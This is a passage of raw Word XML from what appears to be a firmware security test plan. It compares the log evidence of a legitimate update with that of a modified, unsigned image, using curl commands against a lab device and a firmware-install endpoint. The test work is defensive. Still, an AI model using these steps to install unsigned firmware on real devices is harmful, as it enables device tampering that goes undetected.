                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> so the "legitimate OR illegitimate" evidence obligation is unmet. The cause (no signature verification) is RQ-005's protection gap; RQ-008 tests only the evidence footprint.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w:rsidRPr="00EE7A74" w14:paraId="4E7BB01E"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1519796" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74C05700" w14:textId="77777777" w:rsidR="002D7115" w:rsidRDefault="002D7115"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D7115">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Record the evidence delta of a legitimate update (from TC-RQ008-02). 2. On the spare DUT, install the modified/unsigned image per TC-RQ005-03. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F637EC6" w14:textId="77777777" w:rsidR="002D7115" w:rsidRDefault="002D7115"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D7115">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Record its evidence delta (log entries, version change, any classification flag). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C658A69" w14:textId="11D6901E" w:rsidR="00CA26C3" w:rsidRPr="006135F0" w:rsidRDefault="002D7115"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D7115">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Compare: determine whether any evidence field marks the second install as illegitimate/unauthorised.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w:rsidRPr="00EE7A74" w14:paraId="20BBCE3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203DCB" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41EF9F37" w14:textId="69149AE2" w:rsidR="00CA26C3" w:rsidRPr="006135F0" w:rsidRDefault="000B5E79"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0B5E79">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Gap-characterisation test. Expected: the illegitimate install produces an indistinguishable evidence footprint (same "update completed" semantics + version change, no authenticity flag) → confirms G-2 and a FAIL against RQ-008's legitimate/illegitimate requirement. Any evidence field flagging the unsigned image as illegitimate would refute G-2 (document as a positive finding).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FE391B0" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRPr="00AF57B2" w:rsidRDefault="00CA26C3" w:rsidP="00CA26C3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3858E820" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00CA26C3">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CA26C3" w14:paraId="2997D923"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CDEFA3" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="086F1C28" w14:textId="77777777" w:rsidR="00CA26C3"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CA26C3" w14:paraId="08DBC47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71ECCE" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A96738D" w14:textId="03134A33" w:rsidR="00CA26C3" w:rsidRPr="006135F0" w:rsidRDefault="0032669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26698">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ008-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w:rsidRPr="00EE7A74" w14:paraId="4ECE8C7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20CAD58" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B62F7EF" w14:textId="66E177F9" w:rsidR="00CA26C3" w:rsidRPr="006868A2" w:rsidRDefault="0034619A"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6868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Spare DUT 192.168.0.2 (per TC-RQ005-03 constraints); Pi mgmt eth1 = 192.168.50.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w:rsidRPr="00EE7A74" w14:paraId="7D70BA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EFF983" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65440495" w14:textId="55668983" w:rsidR="00CA26C3" w:rsidRPr="006135F0" w:rsidRDefault="00D4338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43383">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl (update + log); binwalk/hex editor (modify container, per TC-RQ005-03); Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w:rsidRPr="00EE7A74" w14:paraId="2E4FE88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8BCCDD4" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="511A1D20" w14:textId="77777777" w:rsidR="001F6D62" w:rsidRPr="001F6D62"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F6D62">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># TC-RQ008-03 Compare evidence footprint: legitimate vs modified/unsigned install</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71DC2638" w14:textId="77777777" w:rsidR="001F6D62" w:rsidRPr="001F6D62"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F6D62">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># (A) legitimate install evidence delta = from TC-RQ008-02 (TC0802_logdiff.txt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B32B21" w14:textId="77777777" w:rsidR="001F6D62" w:rsidRPr="001F6D62"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F6D62">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># (B) illegitimate install (modified container from TC-RQ005-03):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="658A6355" w14:textId="77777777" w:rsidR="001F6D62" w:rsidRPr="006868A2"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC0803_log_pre.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0911A5A0" w14:textId="77777777" w:rsidR="001F6D62" w:rsidRPr="006868A2"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t># ...999 + reboot; upload fw_mod.bin (from TC-RQ005-03); POST /firmware/install; reboot...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="050B9444" w14:textId="77777777" w:rsidR="001F6D62" w:rsidRPr="006868A2"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC0803_log_post.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28439D77" w14:textId="77777777" w:rsidR="001F6D62" w:rsidRPr="006868A2"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/firmware/version -o TC0803_fwver_post.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44FCB0E0" w14:textId="77777777" w:rsidR="001F6D62" w:rsidRPr="006868A2"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>diff TC0803_log_pre.json TC0803_log_post.json | tee TC0803_logdiff.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E312472" w14:textId="2D1A68A1" w:rsidR="00CA26C3" w:rsidRPr="006135F0"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F6D62">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Compare (A) vs (B): any field distinguishing authorised from unauthorised?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w:rsidRPr="00EE7A74" w14:paraId="616F3B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77474" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F5B6CF2" w14:textId="6755C4ED" w:rsidR="00CA26C3" w:rsidRPr="006135F0" w:rsidRDefault="006C048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C048F">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">(B) footprint ≈ (A): update proceeds/attempts identically, no authenticity/authorisation flag; unsigned image not classified as </w:t>
            </w:r>
            <w:r w:rsidRPr="006C048F">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>illegitimate (no signature check</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="006C048F">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> SRIO-2953, cause = RQ-005)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w:rsidRPr="00AD4B09" w14:paraId="0D1D3275"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349C709" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40656695" w14:textId="1ACC52B1" w:rsidR="00CA26C3" w:rsidRPr="006135F0" w:rsidRDefault="006C048F"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Indistinguishable/ Illegi</w:t>
            </w:r>
            <w:r w:rsidR="00BA6101">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>timate flagged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w:rsidRPr="00EE7A74" w14:paraId="17965A2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257232" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B9AAAC7" w14:textId="15D3D320" w:rsidR="00CA26C3" w:rsidRPr="006135F0" w:rsidRDefault="006643DB"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643DB">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC0803_logdiff.txt vs TC0802_logdiff.txt comparison table, /firmware/version deltas, install PCAPs; re-flash log with validated imag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BB30E1A" w14:textId="77777777" w:rsidR="000409F3" w:rsidRDefault="000409F3" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7758F8EE" w14:textId="77777777" w:rsidR="00F642E5" w:rsidRDefault="00F642E5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE0F519" w14:textId="77777777" w:rsidR="00F642E5" w:rsidRDefault="00F642E5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7190F831" w14:textId="77777777" w:rsidR="00F642E5" w:rsidRDefault="00F642E5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1E8E22" w14:textId="77777777" w:rsidR="00F642E5" w:rsidRDefault="00F642E5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19DC4F58" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3358C47F" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="461A2EEC" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5734D0F7" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BE9AB20" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B83628C" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="164B79AB" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD5BAC4" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022FF458" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76526E77" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A72D2F0" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34427339" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5A4A7E" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D62A331" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD003B2" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F228170" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E03D39" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B5DE1A" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3682D8CF" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB92765" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1494A681" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7905CFB4" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283B1261" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25826863" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60AAFF2A" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD9E3CE" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A16CF0" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38EAE6FE" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4212BC00" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F9845E6" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="671EFF5C" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
